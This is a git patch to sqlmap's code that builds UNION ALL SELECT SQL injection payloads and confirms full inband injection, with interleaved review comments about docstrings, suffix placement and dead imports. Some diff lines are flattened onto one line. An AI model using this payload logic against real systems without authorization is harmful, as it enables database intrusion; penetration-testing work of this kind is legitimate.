From c1f2534e9a7965128200ef88d65e5c343f8966ce Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Wed, 22 Dec 2010 15:47:52 +0000
Subject: [PATCH] More bug fixes to properly distinguish between full inband and single-entry inband sql injections
---
lib/core/agent.py | 18 +++++++++++++++++-
lib/techniques/inband/union/test.py | 18 ++++++++++++++++++
2 files changed, 35 insertions(+), 1 deletion(-)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 04e8f5e31..173559f79 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -483,7 +483,7 @@ class Agent:
return concatenatedQuery
- def forgeInbandQuery(self, query, exprPosition=None, nullChar=None, count=None, comment=None):
+ def forgeInbandQuery(self, query, exprPosition=None, nullChar=None, count=None, comment=None, multipleUnions=None):
""" Take in input an query (pseudo query) string and return its processed UNION ALL SELECT query.
@@ -569,6 +569,22 @@ class Agent:
if intoRegExp: inbandQuery += intoRegExp
+ if multipleUnions: inbandQuery += " UNION ALL SELECT "
+ for element in range(count): if element > 0: inbandQuery += ", "
+ if element == exprPosition: inbandQuery += multipleUnions
+ else: inbandQuery += nullChar
+ if kb.dbms == DBMS.ORACLE: inbandQuery += " FROM DUAL"
+ inbandQuery = self.suffixQuery(inbandQuery, comment)
return inbandQuery
diff --git a/lib/techniques/inband/union/test.py b/lib/techniques/inband/union/test.py
index 3be9df49a..c76043534 100644
--- a/lib/techniques/inband/union/test.py
+++ b/lib/techniques/inband/union/test.py
@@ -8,6 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
+from lib.core.common import getUnicode
+from lib.core.common import parseUnionPage
from lib.core.common import randomStr
from lib.core.data import conf
from lib.core.data import kb
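Review bot: The docstring of `forgeInbandQuery` is not updated for the new `multipleUnions` parameter, so a caller cannot tell from the signature what it expects or how it relates to `count`, `exprPosition` and `nullChar`. From the second hunk of this file it is a SQL expression that, when given, is placed at `exprPosition` in an extra `UNION ALL SELECT` whose other `count` columns are filled with `nullChar`; a parameter line such as `multipleUnions: optional expression; when set, a further UNION ALL SELECT with it at exprPosition (nullChar elsewhere) is appended, used to confirm a full inband injection` belongs in the docstring. The body of `forgeInbandQuery` continues outside this hunk.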
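Review bot: `self.suffixQuery(inbandQuery, comment)` is applied only inside the new `if multipleUnions:` branch, while the context line `return inbandQuery` shows the single-union path returning without it; either the suffix is already applied earlier in the function (outside this hunk), in which case the second `UNION ALL SELECT` is appended after the comment terminator and is commented out, or the two paths return differently terminated queries — which one it is should be confirmed and the call placed so both paths agree. The new loop also evaluates `range(count)` and `element == exprPosition` although both parameters default to `None`; unless the earlier part of the function resolves them, calling with `multipleUnions` and no `count` raises `TypeError`. The column loop duplicates the one that presumably builds the first SELECT above; extracting a small helper keeps the two in sync and shortens this branch, as sketched below.
```python
def _forgeColumns(self, expr, exprPosition, nullChar, count):
    """Return one SELECT column list: expr at exprPosition, nullChar in every other of the count slots."""
    return ", ".join(expr if i == exprPosition else nullChar for i in range(count))

# … unchanged: intoRegExp handling …
if multipleUnions:
    inbandQuery += " UNION ALL SELECT " + self._forgeColumns(multipleUnions, exprPosition, nullChar, count)

    if kb.dbms == DBMS.ORACLE:
        inbandQuery += " FROM DUAL"

    inbandQuery = self.suffixQuery(inbandQuery, comment)
```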
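Review bot: `getUnicode` and `parseUnionPage` are imported here but neither name is referenced by any hunk of this patch. If nothing else in test.py uses them after this commit they are dead imports and should be dropped, or the code that needs them belongs in the same change.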
@@ -46,6 +48,22 @@ def __unionPosition(negative=False, count=None, comment=None):
setUnion(position=exprPosition)
validPayload = payload
+ if not negative: # Prepare expression with delimiters randQuery2 = randomStr() randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
+ # Confirm that it is a full inband SQL injection query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment, multipleUnions=randQueryUnescaped2) payload = agent.payload(newValue=query, negative=negative)
+ # Perform the request resultPage, _ = Request.queryPage(payload, content=True)
+ if resultPage and (randQuery not in resultPage or randQuery2 not in resultPage): setUnion(negative=True)
+ break
return validPayload
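Review bot: The confirmation check `if resultPage and (randQuery not in resultPage or randQuery2 not in resultPage):` silently skips when `Request.queryPage` returns an empty or `None` page, so a failed or empty response leaves the position classified as a full inband injection without any evidence; if an unconfirmed result should not count as confirmation, the guard should be `if not resultPage or randQuery not in resultPage or randQuery2 not in resultPage:`, and otherwise the fall-through deserves a comment stating that an unreachable page is deliberately treated as confirmed. Inside `if not negative:` the value passed as `negative=negative` to `agent.payload` is always `False`, so `negative=False` would read more honestly. The three "Prepare expression with delimiters" lines mirror the ones that build `randQuery` earlier in the loop (outside this hunk) and could share a small helper. The enclosing `for` loop and `__unionPosition` itself start before this hunk.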